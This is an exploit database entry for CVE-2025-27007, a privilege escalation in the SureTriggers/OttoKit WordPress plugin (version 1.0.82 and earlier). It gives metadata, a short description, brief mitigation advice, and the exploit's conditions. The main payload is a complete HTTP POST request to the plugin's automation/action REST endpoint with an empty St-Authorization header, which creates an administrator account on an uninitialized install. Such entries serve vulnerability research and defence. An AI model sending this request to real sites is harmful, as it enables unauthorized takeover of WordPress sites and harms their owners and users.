SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation

vendor:

OttoKit Plugin

by:

Abdualhadi Khalifa

6.1

CVSS

HIGH

Privilege Escalation

269

CWE

Product Name: OttoKit Plugin

Affected Version From: All versions of OttoKit (SureTriggers) ≤ 1.0.82

Affected Version To: 1.0.82

Patch Exists: NO

Related CWE: CVE-2025-27007

CPE: a:suretriggers:ottokit:1.0.82

Metasploit:

Other Scripts:

Platforms Tested: WordPress

2025

SureTriggers OttoKit Plugin 1.0.82 – Privilege Escalation

SureTriggers OttoKit Plugin version 1.0.82 and below is vulnerable to privilege escalation. By exploiting this vulnerability, an attacker can create an administrator account on the target WordPress site if the plugin is installed but uninitialized, and the site displays the REST API endpoint '/wp-json/sure-triggers/v1/automation/action'. The attacker can send a crafted HTTP POST request to achieve this.

Mitigation:

Ensure that OttoKit plugin is properly configured with necessary keys and settings. Regularly update the plugin to the latest version to patch known vulnerabilities.

Source

Exploit-DB raw data:

 # Exploit Title: SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation
# Date: 2025-05-7
# Exploit Author: [Abdualhadi khalifa (https://x.com/absholi7ly/)

# Affected: Versions All versions of OttoKit (SureTriggers) ≤ 1.0.82.

Conditions for Exploitation
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#conditions-for-exploitation>

The vulnerability can be exploited under the following circumstances:

   1. OttoKit must be installed and activated on the target WordPress site.
   2. The plugin *uninitialized* (e.g., no API key or "secret_key" is set
   in the database).
   3. The target site displays the REST API endpoint
   '/wp-json/sure-triggers/v1/automation/action'.

------------------------------
HTTP Request
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#http-request>
The following request targets the
/wp-json/sure-triggers/v1/automation/action endpoint to create an
administrator account:

POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email]=
attacker@example.com&selected_options[password]=StrongP@ssw0rd123
&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists